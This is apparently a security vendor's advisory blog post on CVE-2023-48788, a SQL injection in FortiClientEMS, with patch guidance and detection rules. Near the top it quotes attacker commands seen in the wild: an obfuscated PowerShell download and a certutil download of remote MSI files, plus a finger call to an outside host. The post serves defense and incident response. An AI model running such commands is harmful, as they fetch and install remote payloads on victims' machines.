Back to BlogCVE-2023-48788 – FortiClientEMS Pervasive SQL injection in DAS component
Update 4.1.24 – Blumira has observed active exploitation of this vulnerability in the wild. The following indicators have been observed spawning from the sqlserver.exe process.
Finger.exe: "C:\Windows\system32\cmd.exe" /c FINGER [email protected][.]82
PowerShell: "C:\Windows\system32\cmd.exe" /c powershell -nop -c $ds = 'D' + 'Own' + 'LOa'' + 'DfI' + 'le'; Invoke-Expression (New-Object Net.WebClient).$ds.Invoke('http://95.179.241[.]10:23963/Bin/ConnectWiseControl.ClientSetup.msi?e=Access&y=Guest', 'c:\windows\temp\m.msi')
Certutil: certutil -f -urlcache https://ursketz[.]com/bin/bander.msi c:\windows\temp\x.msi
The following default-enabled Blumira detections will trigger if any of these activities are observed in your environment:
- Suspicious Invocation of Finger.exe
- MSSQL XP_CMDSHELL Usage
- Certutil Download
Indicators of Compromise
185.56.83[.]8295.179.241[.]10ursketz[.]com
What Happened?
Fortinet disclosed a critical vulnerability (FG-IR-24-007) on March 12, 2024, which has been identified in the FortiClient Enterprise Management Server (FortiClientEMS). FortiClientEMS is a product designed for centralized management of endpoints within an organization’s network, offering a broad suite of security and management features. This is an SQL injection flaw that could allow an unauthenticated, remote attacker to execute arbitrary code through specially crafted requests.
How Bad is This?
RISK rating is Very High.
SQL injection is a common attack vector that exploits vulnerabilities in an application’s software coding to manipulate backend databases. It allows attackers to insert or “inject” malicious SQL queries into input fields, which can then be executed by the database.
This specific vulnerability allows an unauthenticated, remote attacker to perform SQL injection attacks against the DAS (Database Access Service) component of FortiClientEMS. This SQL injection allows the attacker to execute remote commands using the “deprecated”, built-in xp_cmdshell function in MSSQL. Even when disabled, it is trivial to re-enable with the right SQL commands and should be carefully monitored. The exploitation of such a vulnerability could allow attackers to bypass authentication mechanisms, retrieve or alter sensitive data from the database, and potentially compromise the entire system or network by escalating privileges or deploying further malicious payloads.
Fortinet confirmed that exploitation of this vulnerability had been observed in the wild as of March 21, 2024. This is particularly concerning given the history of Fortinet devices being targeted by various threat actors, including advanced persistent threat (APT) groups and ransomware operators. These actors have exploited vulnerabilities in Fortinet devices in the past, emphasizing the importance of promptly addressing known vulnerabilities.
What Should I Do?
1. Immediately patch these affected FortiClientEMS versions:
- 7.2.0 through 7.2.2
- 7.0.1 through 7.0.10
2. If your Blumira account supports logging with Blumira Agent or Sysmon, ensure that you are sending logs from your FortiClientEMS SQL server and that the “MSSQL XP_CMDSHELL Usage” detection rule is enabled (Settings > Detection Rules).
No Action Needed
If you have the following updated versions, no action is needed:
- 7.2.3 or above
- 7.0.11 or above
How Blumira Can Help
Blumira continues to actively monitor this issue, and look for ways that we can detect any stage of exploitation of these vulnerabilities. If you use FortiEMS, and yet you are not sending those logs to Blumira, we highly recommend it.
Please see below for a full list of global reports specific to Fortigate:
CIS Controls – Firewall Configuration Change (Fortigate)
CIS Controls – IDS/IPS Alerts (Fortigate)
CIS Controls – VPN Connections (Fortigate)
CMMC – Firewall Configuration Change (Fortigate)
CMMC – IDS/IPS Alerts (Fortigate)
CMMC – VPN Connections (Fortigate)
FERPA – Firewall Configuration Change (Fortigate)
FERPA – IDS/IPS Alerts (Fortigate)
FERPA – VPN Connections (Fortigate)
FINRA – Firewall Configuration Change (Fortigate)
FINRA – IDS/IPS Alerts (Fortigate)
FINRA – VPN Connections (Fortigate)
Fortigate: Failed Admin Management Login from External IP
Fortigate: Successful Admin Management Login from External IP
Fortigate: System Configuration Changes
Fortigate: VPN – Successful Logins
GLBA – Firewall Configuration Change (Fortigate)
GLBA – IDS/IPS Alerts (Fortigate)
GLBA – VPN Connections (Fortigate)
HIPAA/HITECH – Firewall Configuration Change (Fortigate)
HIPAA/HITECH – IDS/IPS Alerts (Fortigate)
HIPAA/HITECH – VPN Connections (Fortigate)
ISO 27001 – Firewall Configuration Change (Fortigate)
ISO 27001 – VPN Connections (Fortigate)
ISO 27002 – Firewall Configuration Change (Fortigate)
ISO 27002 – IDS/IPS Alerts (Fortigate)
ISO 27002 – VPN Connections (Fortigate)
NIST – Fortigate Configuration Changes
NIST – VPN Connection (Fortigate)
PCI – Firewall Configuration Change (Fortigate)
PCI – IDS/IPS Alerts (Fortigate)
PCI – VPN Connections (Fortigate)
SOC2 – Firewall Configuration Change (Fortigate)
SOC2 – IDS/IPS Alerts (Fortigate)
SOC2 – VPN Connections (Fortigate)